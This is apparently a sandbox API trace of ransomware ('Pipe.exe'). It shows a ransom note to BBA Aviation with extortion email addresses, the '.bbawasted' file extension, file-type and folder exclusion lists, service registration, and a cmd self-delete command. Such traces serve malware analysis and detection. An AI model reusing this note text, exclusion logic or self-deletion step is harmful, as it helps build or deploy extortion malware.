[0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593e90 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593ee0 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x594048 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x594070 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x594160 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5941d8 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a248 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a338 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a360 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a4c8 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a518 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593eb8 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593f08 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593f58 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593f80 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593ff8 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5940e8 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x594188 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a270 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a2e8 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a310 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a388 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a400 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a428 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a450 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a478 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a568 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a590 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a5b8 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593e68 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593f30 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593fa8 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593fd0 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5940c0 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x594110 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x594138 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a298 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a2c0 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a3b0 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a4f0 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a540 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a5e0 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a608 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x594020 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x594098 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5941b0 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a3d8 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a4a0 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a630 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599880 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a1a0 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a1d0 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a200 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59aa30 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59aa60 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599940 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a170 | out: hHeap=0x580000) returned 1 [0081.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599910 | out: hHeap=0x580000) returned 1 [0081.800] lstrlenW (lpString="C:\\Windows\\SysWOW64\\Pipe.exe") returned 28 [0081.800] lstrcmpW (lpString1=".exe", lpString2=":bin") returned -1 [0081.800] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xda) returned 0x5d9b58 [0081.800] _snwprintf (in: _Dest=0x5d9b58, _Count=0x6d, _Format="cmd /c choice /t %u /d y & attrib -h \"%s\" & del \"%s\"" | out: _Dest="cmd /c choice /t 10 /d y & attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" & del \"C:\\Windows\\SysWOW64\\Pipe.exe\"") returned 104 [0081.800] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" & del \"C:\\Windows\\SysWOW64\\Pipe.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fef8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ff3c | out: lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" & del \"C:\\Windows\\SysWOW64\\Pipe.exe\"", lpProcessInformation=0x18ff3c*(hProcess=0xe0, hThread=0xc0, dwProcessId=0x930, dwThreadId=0x940)) returned 1 [0082.145] CloseHandle (hObject=0xc0) returned 1 [0082.145] CloseHandle (hObject=0xe0) returned 1 [0082.145] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d9b58 | out: hHeap=0x580000) returned 1 [0082.145] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x0) returned 0x1001af6 [0082.145] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0xffffffff [0082.145] CloseHandle (hObject=0x94) returned 1 [0082.148] DeleteFileW (lpFileName="C:\\Windows\\TEMP\\Pipe.dmp" (normalized: "c:\\windows\\temp\\pipe.dmp")) returned 1 [0082.150] ExitProcess (uExitCode=0x0) Thread: id = 320 os_tid = 0x81c Thread: id = 321 os_tid = 0xb70 Thread: id = 322 os_tid = 0xb6c [0066.002] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xd8 [0066.002] RegisterServiceCtrlHandlerW (lpServiceName="Pipe", lpHandlerProc=0x1005505) returned 0x59dee0 [0066.002] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1005e2a, lpParameter=0x100a5d4, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdc [0066.003] SetServiceStatus (hServiceStatus=0x59dee0, lpServiceStatus=0xe5ff4c*(dwServiceType=0x30, dwCurrentState=0x4, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0066.031] WaitForMultipleObjects (nCount=0x2, lpHandles=0xe5ff68*=0xd8, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0081.784] SetServiceStatus (hServiceStatus=0x59dee0, lpServiceStatus=0xe5ff4c*(dwServiceType=0x30, dwCurrentState=0x3, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0081.786] CloseHandle (hObject=0xdc) returned 1 [0081.786] SetServiceStatus (hServiceStatus=0x59dee0, lpServiceStatus=0xe5ff4c*(dwServiceType=0x30, dwCurrentState=0x1, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0081.795] CloseHandle (hObject=0xd8) returned 1 Thread: id = 323 os_tid = 0xa90 [0066.003] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x59a0c8 [0066.004] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x59df58 [0066.004] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x36) returned 0x59c5b0 [0066.031] _wcslwr (in: _String=0x59c5b0 | out: _String="movable|fixed|remote|share") returned="movable|fixed|remote|share" [0066.031] StrChrW (lpStart="movable|fixed|remote|share", wMatch=0x7c) returned="|fixed|remote|share" [0066.031] StrChrW (lpStart="fixed|remote|share", wMatch=0x7c) returned="|remote|share" [0066.031] StrChrW (lpStart="remote|share", wMatch=0x7c) returned="|share" [0066.032] StrChrW (lpStart="share", wMatch=0x7c) returned 0x0 [0066.032] lstrlenW (lpString="share") returned 5 [0066.032] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59c5b0 | out: hHeap=0x580000) returned 1 [0066.032] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x8) returned 0x59cba8 [0066.032] StrToIntExW (in: pszString="128", dwFlags=0x0, piRet=0xf9ff5c | out: piRet=0xf9ff5c) returned 1 [0066.032] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59cba8 | out: hHeap=0x580000) returned 1 [0066.032] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x6) returned 0x59cba8 [0066.032] StrToIntExW (in: pszString="20", dwFlags=0x0, piRet=0xf9ff60 | out: piRet=0xf9ff60) returned 1 [0066.032] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59cba8 | out: hHeap=0x580000) returned 1 [0066.032] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x406) returned 0x5a3aa8 [0066.032] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x11a) returned 0x5a3eb8 [0066.032] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c) returned 0x59c5b0 [0066.032] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5a3eb8, cbMultiByte=282, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 282 [0066.032] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x236) returned 0x5a3fe8 [0066.033] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5a3eb8, cbMultiByte=282, lpWideCharStr=0x5a3fe8, cchWideChar=282 | out: lpWideCharStr="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n") returned 282 [0066.033] lstrlenW (lpString="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n") returned 280 [0066.033] StrChrW (lpStart="[begin_key]*[end_key]", wMatch=0x2a) returned="*[end_key]" [0066.033] StrStrW (lpFirst="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n", lpSrch="[begin_key]*[end_key]") returned="[begin_key]*[end_key]\r\nKEEP IT\r\n" [0066.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x236) returned 0x5a4228 [0066.033] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a3fe8 | out: hHeap=0x580000) returned 1 [0066.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x4) returned 0x59cba8 [0066.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x8) returned 0x5a3fe8 [0066.033] StrToIntExW (in: pszString="300", dwFlags=0x0, piRet=0xf9ff64 | out: piRet=0xf9ff64) returned 1 [0066.033] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a3fe8 | out: hHeap=0x580000) returned 1 [0066.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x59df80 [0066.033] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\lck.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x18 [0066.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x30) returned 0x5a3fe8 [0066.033] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\lck.log", lpDst=0x5a3fe8, nSize=0x18 | out: lpDst="C:\\Windows\\TEMP\\lck.log") returned 0x18 [0066.033] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59df80 | out: hHeap=0x580000) returned 1 [0066.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x290) returned 0x5a4468 [0066.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xb8) returned 0x5a4020 [0066.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x150) returned 0x5a4700 [0066.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xe) returned 0x59c770 [0066.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x6) returned 0x5a4870 [0066.033] StrToIntExW (in: pszString="50", dwFlags=0x0, piRet=0xf9fec0 | out: piRet=0xf9fec0) returned 1 [0066.033] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a4870 | out: hHeap=0x580000) returned 1 [0066.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x6) returned 0x5a4870 [0066.034] StrToIntExW (in: pszString="32", dwFlags=0x0, piRet=0xf9ff38 | out: piRet=0xf9ff38) returned 1 [0066.034] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a4870 | out: hHeap=0x580000) returned 1 [0066.034] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0xf9fe8c | out: ppstm=0xf9fe8c*=0x59df80) returned 0x0 [0066.035] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.035] lstrlenW (lpString=".bbawasted_info") returned 15 [0066.035] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x59df58*=0x2e, cb=0x1e, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.035] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.035] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.035] lstrlenW (lpString=".bbawasted") returned 10 [0066.035] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x59a0c8*=0x2e, cb=0x14, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.035] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.035] lstrlenW (lpString="*\\NTLDR|*\\BOOTMGR|*\\GRLDR|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe") returned 327 [0066.035] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4468*=0x2a, cb=0x28e, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.035] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.035] StrChrW (lpStart="%ProgramData%|%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0066.035] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xf [0066.035] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x59dff8 [0066.035] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%", lpDst=0x59dff8, nSize=0xf | out: lpDst="C:\\ProgramData") returned 0xf [0066.035] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x59dff8*=0x43, cb=0x1c, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.036] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59dff8 | out: hHeap=0x580000) returned 1 [0066.036] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.036] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.036] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.036] StrChrW (lpStart="%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0066.036] ExpandEnvironmentStringsW (in: lpSrc="%windir%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xb [0066.036] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x59a0e8 [0066.036] ExpandEnvironmentStringsW (in: lpSrc="%windir%", lpDst=0x59a0e8, nSize=0xb | out: lpDst="C:\\Windows") returned 0xb [0066.036] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x59a0e8*=0x43, cb=0x14, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.036] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a0e8 | out: hHeap=0x580000) returned 1 [0066.036] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.036] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.036] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.036] StrChrW (lpStart="%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0066.036] ExpandEnvironmentStringsW (in: lpSrc="%temp%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x10 [0066.036] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x59dff8 [0066.036] ExpandEnvironmentStringsW (in: lpSrc="%temp%", lpDst=0x59dff8, nSize=0x10 | out: lpDst="C:\\Windows\\TEMP") returned 0x10 [0066.036] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x59dff8*=0x43, cb=0x1e, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.036] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59dff8 | out: hHeap=0x580000) returned 1 [0066.036] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.036] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.036] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.036] StrChrW (lpStart="%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0066.036] ExpandEnvironmentStringsW (in: lpSrc="%AppData%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x39 [0066.036] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x72) returned 0x590e08 [0066.036] ExpandEnvironmentStringsW (in: lpSrc="%AppData%", lpDst=0x590e08, nSize=0x39 | out: lpDst="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x39 [0066.036] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x590e08*=0x43, cb=0x70, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.037] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x590e08 | out: hHeap=0x580000) returned 1 [0066.037] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.037] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.037] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.037] StrChrW (lpStart="C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Program Files|C:\\Program Files (x86)" [0066.037] ExpandEnvironmentStringsW (in: lpSrc="C:\\Recovery", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xc [0066.037] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x59a0e8 [0066.037] ExpandEnvironmentStringsW (in: lpSrc="C:\\Recovery", lpDst=0x59a0e8, nSize=0xc | out: lpDst="C:\\Recovery") returned 0xc [0066.037] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x59a0e8*=0x43, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.037] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a0e8 | out: hHeap=0x580000) returned 1 [0066.037] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.037] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.037] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.037] StrChrW (lpStart="C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Program Files (x86)" [0066.037] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x11 [0066.037] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x22) returned 0x5a4108 [0066.037] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files", lpDst=0x5a4108, nSize=0x11 | out: lpDst="C:\\Program Files") returned 0x11 [0066.037] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4108*=0x43, cb=0x20, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.037] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a4108 | out: hHeap=0x580000) returned 1 [0066.037] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.037] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.037] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.037] StrChrW (lpStart="C:\\Program Files (x86)", wMatch=0x7c) returned 0x0 [0066.037] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x17 [0066.037] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2e) returned 0x5a4108 [0066.037] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)", lpDst=0x5a4108, nSize=0x17 | out: lpDst="C:\\Program Files (x86)") returned 0x17 [0066.037] 